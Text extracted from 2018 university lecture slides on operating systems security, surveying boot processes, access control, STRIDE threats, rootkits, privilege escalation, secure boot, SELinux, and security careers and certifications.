Operating Systems Security (524870) Computer Security & OS Lab Dept. of Software Science, DKU Cho, Seong-je (조성제) Fall, 2018 sjcho at dankook.ac.kr
Operating Systems Security
(524870)
Computer Security & OS LabDept. of Software Science, DKU
Cho, Seong-je (조성제)
Fall, 2018
sjcho at dankook.ac.kr
Many slides taken from Google Search,
Textbook (Its site), and Web sites
• Textbook site
http://williamstallings.com/ComputerSecurity/
http://www.pearsonhighered.com/educator/academic/product/1,,0132775069,00.html
Many photos in presentation licensed from google images or wikipedia
524870, F’18- 3 -
Overview of the BIOS/MBR Boot Process
https://neosmart.net/wiki/mbr-boot-process/
Computer Security & OS Lab.
• Bootloader = Boot manager
524870, F’18- 4 -
Popular Bootloaders
NTLDR: NT Loader
Computer Security & OS Lab.
524870, F’18- 5 -
Boot Process
https://neosmart.net/wiki/mbr-boot-process/
Computer Security & OS Lab.
524870, F’18- 6 -
Windows Boot Process
http://www.blackhat.com/presentations/bh-usa-09/KLEISSNER/BHUSA09-Kleissner-StonedBootkit-SLIDES.pdf
Computer Security & OS Lab.
What is Operating Systems?
524870, F’18- 8 -
Operating Systems
a collection of software that manages computer hardware resources and provides common services for computer programs Kernel provides the most basic level of control over all
of the computer’s hardware devices
OS must be capable of distinguishing between requests which should be allowed to be processed, and others which should not be processed
Computer Security & OS Lab.
524870, F’18- 9 -
Access Control: File Permissions
File permissions (Authorization) Readable/Writeable/eXecutable by a user or group of users
In Unix-like OS’s, a file permission matrix shows who is allowed to do what to the file.
Files have owner permissions, which show what the owner can do, and group permissions, which show what some group id can do, and world permissions, which give default access rights.
Computer Security & OS Lab.
524870, F’18-10-
Access Control: File Permissions
Authorization on Windows 7
Computer Security & OS Lab.
524870, F’18-11-
Access Control: File Permissions
Android 2.2 defines 134 permissions
● Such as dialing (CALL_PHONE), taking pictures (CAMERA)
Ask which permissions is accepted at install time
Computer Security & OS Lab.
524870, F’18- 12 -
Virtual Address Space of a Linux Process
Computer Security & OS Lab.
524870, F’18- 13 -
Linux OS / Unix OS
ID/Password
/etc/passwd, /etc/shadow
Special permissions: setuid, setgid, sticky bits
setuid privileged programs
Real User ID (RUID), Effective User ID (EUID)
setuid(uid), seteuid(uid), setgid(), setegid()
Library functions: system(const char *cmd),
System calls: execve( ),
Commands
uname, chmod, passwd, su, chsh, setenv,
Race Conditions: symlink race
Audit log
/var/log/{syslog, dmesg, messages, btmp, … }
Commands: dmesg, last,
Environment variables
LD_LIBRARY_PATH, LD_PRELOAD,
Computer Security & OS Lab.
What is Computer Security?
Which types of threats are there?
524870, F’18- 15 -
Threat Modeling
Risks or Threats under Internet & Mobile
MS STRIDE Model Spoofing
Password cracking
Tampering
Altering information
Repudiation
Information Disclosure
Stealing information, Packet capture,
Denial-of-Services (DoS)
Deleting information, Crashing systems
Elevation of Privileges
Rooting, Buffer overflow, …
Computer Security & OS Lab.
524870, F’18- 16 -
Keyloggers – H/W & S/W
Computer Security & OS Lab.
524870, F’18- 17 -
Rootkit
Program that perform system hooking or modifies functionality of OS
Hide files, processes, other objects to conceal its presence
Intercepts and alters the normal execution flow
Some rootkits can install as device drivers
Computer Security & OS Lab.
• root + kit• It can continue to access to a
computer by subverting standard OS functionality or other apps.
• It works in a specific OS, modifying the kernel of the OS.
• If we install a new OS, we could clear the threat of rootkit embedded in the previous OS
524870, F’18- 18 -
Rootkit
User-mode rootkit
Kernel-mode rootkit
Hybrid rootkit
Firmware rootkit
Computer Security & OS Lab.
524870, F’18- 19 -
Bootkit threat
• bootkit = boot + rootkit• It is loaded on startup directly by the BIOS before the load of OS• It is independent on any OS.• It is more subtle and difficult to detect.
• VBR (Volume Boot Record)• IPL (Initial Program Loader)
Computer Security & OS Lab.
524870, F’18- 20 -
Privilege Escalation Attacks
https://en.wikipedia.org/wiki/Privilege_escalation
Computer Security & OS Lab.
524870, F’18- 21 -
Privilege Escalation Attacks
Control hijacking attacks
Buffer overflow attacks in Stack/Data/Heap sections
Code-injection attacks
Code-reuse attacks
Integer overflow attacks
Format string vulnerabilities
Double free space on heap
Use after free
Return-to-Libc (R2L)
Return-Oriented Programing (ROP)
Computer Security & OS Lab.
524870, F’18- 22 -
Escalation of Privilege
Rooting
How to root your Android Phone or Table (and Unroot it)
TowelRoot v3, v4 … by Geohot
How to detect a rooted device on Android
Computer Security & OS Lab.
524870, F’18- 23 -
In memory attack
Memory dump
DMA attack Attacker could manipulate DMA with a tool to dump the entire
memory
Interface such as PCI Express and Thunderbolt are vulnerable
Memory disclosure attack ( ↔ Memory sanitization)
Core Dump Analysis
Cold boot attack Boot stolen device into an attack-controlled OS that outputs memory
contents
Computer Security & OS Lab.
524870, F’18- 24 -
Anatomy of a Ransomware Attack
Fileless Ransomware: Sorebrect
Email arrival (with attachment) Entry to the desktop (The document is opened & the macro
runs in memory) Memory access (Powershell script and Additional script are executed in
memory, and the encryption key is downloaded) Data encryption Bad news
https://www.safaribooksonline.com/library/view/ransomware/9781491967874/ch01.html
http://www.redlambda.com/blog/understanding-sorebrecht-ransomware
Computer Security & OS Lab.
• Ransomware: a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid.
OS Security
524870, F’18- 26 -
Threats (STRIDE) vs. CIA
Threats
Repudiation: “I didn’t send that email,” “I didn’t visit that web site,”
Rootkits, Rooting (Jailbreaking),
Properties
Confidentiality: Data cannot be disclosed to unauthorized individuals / systems
Integrity: Data cannot be modified undetectably
Availability: Data must be available when needed
Forensic
Computer Security & OS Lab.
Threat Property
Spoofing identity Authentication, Authenticity
Tampering with data Integrity
Repudiation Auditing
Information Disclosure Confidentiality
Denial of Service Availability
Elevation of Privilege Authorization
The STRIDE model describes the threats of violation of 6 information flow properties
524870, F’18- 27 -
Secure Boot
Before loading SW, verify
It came from the OEM
It has not been tampered with
Hardware TMP/TEE can provide
Protected key storage
Protected signature storage
Signature generation
Computer Security & OS Lab.
524870, F’18- 28 -
Secure Boot
Computer Security & OS Lab.
Root-of-Trust TPM (Trusted Platform Module)
MTM (Mobile Trusted Module)
ARM TrustZone
Trusted Execution Environment (TEE)
Windows 8 secure boot
524870, F’18- 29 -
On screen keyboard, Virtual keyboard
Computer Security & OS Lab.
524870, F’18- 30 -
Authentication
Samsung Galaxy Note 7
Galaxy Note 7 is Samsung’s best smartphone to date
Retina/Iris scanner
Unchangeable info compared to password
» Need a Secure storage (Trusted Zone)
Galaxy note 7 explosion
Galaxy note 7 recall
Samsung recalls Note 7 flagship over explosive batteries – BBC News
Computer Security & OS Lab.
524870, F’18- 31 -
Preventing Hijacking Attacks
Rewrite SW in a type safe language (Java, ML)
LibSafe
StackGuard, StackShield
Control Flow Integrity
Marking memory as not-execute DEP (Data Execution Prevention) on MS Windows
Writeable XOR eXecutable
NX-bit on AMD Athlon 64
XD-bit on Intel P4 Prescott
PaX project on Linux
ASLR (Address Space Layout Randomization)
Computer Security & OS Lab.
524870, F’18- 32 -
Filesystem-level encryption
Encrypting File System (EFS) on Microsoft Windows
eCryptfs (Enterprise Cryptographic Filesystem)
A package of disk encryption SW for Linux
Ext4, added in Linux kernel 4.1 on June 2015
Secure USB
Encrypted USD Flash Drives
Computer Security & OS Lab.
524870, F’18- 33 -
SE Linux/etc/{passwd, shadow}, /usr/bin/passwd
Computer Security & OS Lab.
524870, F’18- 34 -
Trusted Execution Environment (TEE)
TEE: a secure area of a main processor.
It guarantees code and data loaded inside to be protected with respect to confidentiality and integrity
ARM TrustZone
Computer Security & OS Lab.
Rich Execution Environment (REE)
524870, F’18- 35 -
Samsung Knox
an enterprise mobile security solution pre-installed in most of Samsung's smartphones, tablets, and wearables
It provides security features that enable business and personal content to coexist on the same handset.
Securing the “BYOD (Bring Your Own Device)” paradigm
Trusted Boot using TIMA
TIMA = TrustZone-based Integrity Measurement Architecture
Real-Time Kernel Protection (RKP)
Computer Security & OS Lab.
524870, F’18- 36 -
OS Security (from techopedia.com)
The process of ensuring OS integrity, confidentiality and availability
OS security refers to specified steps or measures used to protect the OS from threats, viruses, worms, malware or remote hacker intrusions.
OS security encompasses all preventive-control techniques, which safeguard any computer assets capable of being stolen, edited or deleted if OS security is compromised.
OS security allows different applications and programs to perform required tasks and stop unauthorized interference.
OS security may be approached in many ways, including adherence to the following:
Performing regular OS patch updates
Installing updated antivirus engines and software
Scrutinizing all incoming and outgoing network traffic through a firewall
Creating secure accounts with required privileges only (i.e., user
management)
Computer Security & OS Lab.
524870, F’18- 37 -
SELinux (Security Enhanced Linux)
SELinux features (source: http://drsalbertspijkers.blogspot.kr/2013/06/linux-kernel-security-it-is-necessary.html)
1. Clean separation of policy from enforcement
2. Well-defined policy interfaces
3. Support for applications querying the policy and enforcing access control
4. Independent of specific policies and policy languages
5. Independent of specific security label formats and contents
6. Individual labels and controls for kernel objects and services
7. Caching of access decisions for efficiency
8. Support for policy changes
9. Separate measures for protecting system integrity (domain-type) and data confidentiality (multilevel security)
10. Very flexible policy
11. Controls over process initialization and inheritance and program execution
12. Controls over file systems, directories, files, and open file descriptors
13. Controls over sockets, messages, and network interfaces
14. Controls over use of "capabilities"
Computer Security & OS Lab.
524870, F’18- 38 -
SELinux
Pros and Cons Admin skill set (learning curve) - High
Complex and powerful access control mechanism - Yes
Detailed configuration required - Yes
GUI tools to write / modify rules set - Yes
CLI tools to write / modify rules set - Yes
Ease of use - No (often described as horrible to use)
Binary package - Available for most Linux distributions
System performance impact: None
Security Framework: Mandatory access controls using Flask
Auditing and logging supported - Yes
Typical user base - Enterprise users
Documentation - Well documented
* Source: Linux Kernel Security (it is necessary)
Computer Security & OS Lab.
524870, F’18- 39 -
SELinux / AppArmor / Grsecurity
New user / ease of use : Grsecurity
Easy to understand policy and tools : AppArmor
Most powerful access control mechanism : SELinux
Computer Security & OS Lab.
524870, F’18- 40 -
Security Enhancements for Android
SE for Android (http://selinuxproject.org/page/SEAndroid)
Security Enhancements for Android™ (SE for Android) is a project to identify and address critical gaps in the security of Android.
Initially, the project is enabling the use of SELinux in Android in order to
limit the damage that can be done by flawed or malicious apps and in
order to enforce separation guarantees between apps.
However, the scope of the project is not limited to SELinux.
SE for Android also refers to the reference implementation produced by the project.
The current reference implementation provides a worked example of how
to enable and apply SELinux at the lower layers of the Android software
stack and provides a working demonstration of the value provided by
SELinux in confining various root exploits and application vulnerabilities.
Android 4.3 is the first Android release version to fully include and enable the SELinux support contributed by the SE for Android project.
Computer Security & OS Lab.
524870, F’18- 41 -
Lab Exercises (Hands-on experience)
Topics for practical training
Password cracking
SELinux – Mandatory Access Control (MAC)
Buffer Overflow (BoF) + Return to Library (Ret2Libc)
Lord of Buffer overflow (LoB)
PLT/GOT (procedure linkage table / global offset table) overwrite
Rootkit, TowlRoot v3/v4
Backdoor
Threats and Protection associated Shared Library
Packet capture using Wireshark
…
Computer Security & OS Lab.
524870, F’18- 42 -
What is Computer Security?
Allow intended use of computer systems
Prevent unintended use that may cause harm
Protect information and systems from security threats
Computer Security & OS Lab.
Make a Difference
Learn About Security
524870, F’18- 44 -
How Can You Make a Difference?
Be a more security-aware user
Make better security decisions
Be a more security-aware developer
Design & build more secure codes & systems
Be a more security-aware tester (defender)
Be a security practitioner & researcher Identify security issues
Propose new security solutions
Computer Security & OS Lab.
524870, F’18- 45 -
Kali Linux
a Debian-derived Linux distribution designed for digital forensics and penetration testing
Most Advanced Penetration Testing Distribution, Ever. (https://www.kali.org/ )
https://en.wikipedia.org/wiki/Kali_Linux
Kali Linux has over 600 preinstalled penetration-testing programs, including
Armitage (a graphical cyber attack management tool),
Nmap (a port scanner),
Wireshark (a packet analyzer),
John the Ripper password cracker,
Aircrack-ng (a software suite for penetration-testing wireless LANs),
Burp suite
OWASP ZAP web application security scanners.
Computer Security & OS Lab.
524870, F’18- 46 -
War game sites (Training ground)
Domestic Online Information security e-learning center (정보보호기술온라인훈련장):
http://www.sis.or.kr/ Training (훈련공간)
Challenge: http://www.simples.kr/ Community challenge 보고서
Hacker School
http://www.hackerschool.org/Sub_Html/HS_Community/index.html → 운동장
Free Training Zone (FTZ)
Lord of Buffer Overflow (LoB)
International (Sites in Foreign countries)
Internet Security & Challenges (Net Force): http://www.net-force.nl/ <challenges>
Hack This Site! -- http://www.hackthissite.org/
Reversers’ playground (CrackMe site): http://crackmes.de/
A great site for testing your reversing skills
Think Devise Hack (tdhack.com): a lot of challenges including cryptographic riddles, hackmes and SW applications to crack for both Windows and Linux
Computer Security & OS Lab.
Security Jobs
Specific specialty areas & work roles
in the security industry
Computer Security & OS Lab.
524870, F’18- 48 -
The 7 Types of Security Jobs, According To NIST
1. Securely provision (보안시스템구축)
Risk management, SW development, Systems architecture, Technology R&D, …
2. Operate and maintain (운영과유지보수)
Data administration, Knowledge management, Network services, Systems administration, Systems analysis
3. Oversee and govern (감독과통제)
Training, education, Cybersecurity management, Strategic planning and policy, Acquisition and program/project management
4. Collect and operate (수집과운영)
Collection operations, Cyber operational planning
5. Protect and defend (보호와방어)
Cyber defense analysis, Incident response, Vulnerability assessment & management, …
6. Analyze (분석)
Threat analysis, Exploitation analysis, All-source analysis, …
7. Investigate (수사및조사)
Digital forensics
“미국 NIST가선정한 7가지보안직무요약” – https://www.boannews.com/media/view.asp?idx=52310
Computer Security & OS Lab.
524870, F’18- 49 -
The 20 Coolest Jobs in Information Security
#1 Information Security Crime Investigator/Forensics Expert
#2 System, Network, and/or Web Penetration Tester
#3 Forensic Analyst
#4 Incident Responder
#5 Security Architect
#6 Malware Analyst
#7 Network Security Engineer
#8 Security Analyst
#9 Computer Crime Investigator
#10 CISO/ISO or Director of Security
#11 Application Penetration Tester
#12 Security Operations Center Analyst
#13 Prosecutor Specializing in Information Security Crime
#14 Technical Director and Deputy CISO
#15 Intrusion Analyst
#16 Vulnerability Researcher/ Exploit Developer
#17 Security Auditor
#18 Security-savvy Software Developer
Computer Security & OS Lab.
#19 Security Maven in an Application Developer Organization #20 Disaster Recovery/Business Continuity Analyst/Manager
Source: SANShttp://www.sans.org/20coolestcareers/
524870, F’18- 50 -
보안 직업군 프로젝트
Source: http://www.boannews.com/media/view.asp?idx=37409&kind=0
보안 컨설턴트
보안기술 기반으로 경영 흐름과 융합보안 트렌드를 읽어야
[Interview] 이상훈 이글루시큐리티 컨설팅사업부2팀 팀장
악성코드 분석가
악성코드와의 피 말리는 싸움 위해선 인내심과 집중력이 필수
[Interview] ASEC 분석1팀 한창규 팀장 & 김아영 연구원
모의해킹 전문가
쉽게 뚫려서 많이 당황하셨어요? 이게 바로 회사의 보안 현실이죠!
[Interview] LG CNS 보안컨설팅팀 곽규복 차장 & 박태석 과장
보안 기술영업
기술적 깊이와 함께 비즈니스 마인드까지 갖추고 싶다면 도전하라
[Interview] IBM Korea 박형근 부장 / 보안커뮤니티 SecurityPlus 운영자
보안관제사
사이버세상 안전 위해 365일 24시간 해킹대응의 최전방에서 뛴다
[Interview] SK인포섹 김종현 보안관제팀장
…
Computer Security & OS Lab.
524870, F’18- 51 -
Certification
CCNA Security Certification
Cisco Certified Network Associate Security (CCNA Security)
http://www.cisco.com/web/learning/certifications/associate/ccna_security/
CISSP (Certified Information Systems Security Professional)
https://www.isc2.org/CISSP/Default.aspx
The CISSP exam is based on the following domains: Access control, Telecommunications and Network Security, Software Development Security, Operations security
MGT414: SANS +S Training Program for the CISSP® Certification Exam
CISA (Certified Information Systems Auditor) http://www.isaca.org/Certification/CISA-Certified-Information-Systems-
Auditor/Pages/default.aspx?utm_source=multiple&utm_medium=multiple&utm_content=friendly&utm_campaign=cisa
GIAC Information Security Professional (GISP)
http://www.giac.org/certification/information-security-professional-gisp
Computer Security & OS Lab.
524870, F’18- 52 -
Certificate / License (of qualification)
정보보안기사 (정보보안 국가기술자격)
Written test:
System security, Network security, Application security, 정보보안일반,
정보보안관리 및 법규
Practical (Skill) test:
정보보안실무/실기
Schedule for examination
1st/2nd : July 6th & Aug. 24th / Oct. 26th & Dec. 7th, 2013 for Written & Skill
7th/8th : Apr. 2nd & May 28th / Sep. 24th & Nov. 12th, 2016 for written & Skill test
» Application period: Feb. 29th ~ Mar. 4th, Aug. 22th ~ 26th 2016
정보보안산업기사: 정보보안 기사의 업무를 보조할 수 있는 기초이론과 실무능력 수행
[주간한국] 떠오르는 유망직종 정보보안전문가 ‘정보보안기사, 정보보안산업기사’ 자격증으로 준비
Computer Security & OS Lab.
524870, F’18- 53 -
Any questions?
Hardships, The way of suffering
An unremitting effort, Sincerity, Diligence
---------------------------------------------------------------------
Expert, Specialist, Elite in Security
Computer Security & OS Lab.
524870, F’18- 54 -
Summary
Major threats: STRIDE
Computer security: CIA
Field experience study (Actual practice)
SecuInside 2018: CTF, CTB (Capture The Bugs) challenge
July 14th~15th, Jam2Go, GangNam-Gu, Seoul. (http://secuinside.com/2018/)
ISEC 2018 (Information Security Conference), 12th Int’l Cyber Security Conf.
Aug. 30th ~ 31th, COEX, (http://www.isecconference.org/2018/)
PoC 2018 (Power of Community)
Nov. 8-9 Seoul (http://www.powerofcommunity.net)
Cyber Ethics is important
The 10th Hacking Defense Contest: July-01-2013
정부 주최 ‘해킹방어대회’ 4시간 만에 중단
“Sophisticated” British hacker faces 12 years in US jail for infiltrating Federal Reserve
Computer Security & OS Lab.